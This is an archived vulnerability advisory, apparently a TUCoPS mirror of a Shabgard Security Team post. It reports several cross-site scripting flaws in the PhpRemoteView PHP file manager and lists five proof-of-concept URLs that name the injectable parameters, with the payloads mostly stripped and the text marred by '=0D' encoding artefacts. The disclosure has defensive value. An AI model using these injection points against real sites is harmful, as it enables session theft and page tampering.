TUCoPS :: Web :: PHP :: b06-2240.htm

PhpRemoteView Multiple Xss Vulnerabilities
PhpRemoteView Multiple Xss Vulnerabilities
PhpRemoteView Multiple Xss Vulnerabilities


---------------------------------------------=0D
 PhpRemoteView Multiple Xss Vulnerabilities=0D
---------------------------------------------=0D
 =0D
 Site:=0D
   =0D
http://php.spb.ru/remview/ =0D 
=0D
 Bug:=0D
 =0D
1- =0D">http://victim/path/PRV.php?&c=v&d=[path]&f=">=0D 
=0D
2- =0D">http://victim/path/PRV.php?c=l&d=">=0D 
=0D
  3-=0D
=0D">http://victim/path/PRV.php?c=setup&ref=">=0D 
=0D
4-http://victim/path/PRV.php?c=d&d=[path]=0D 
    MAKE DIR (type full path) : ">=0D
=0D
5-http://victim/path/PRV.php?c=d&d=[path]=0D 
    Full file name : ">=0D
=0D
---------------------------------------------=0D
 Source :=0D
http://soot.shabgard.org/bugs/phpremoteview.txt=0D 
=0D
 Credit :=0D
  Soot =0D
  Shabgard Security Team=0D
http://www.shabgard.org =0D 
=0D
 Greetz : =0D
  Hregy,Elite,Bl2k,Littlehacker=0D
---------------------------------------------=0D

TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2024 AOH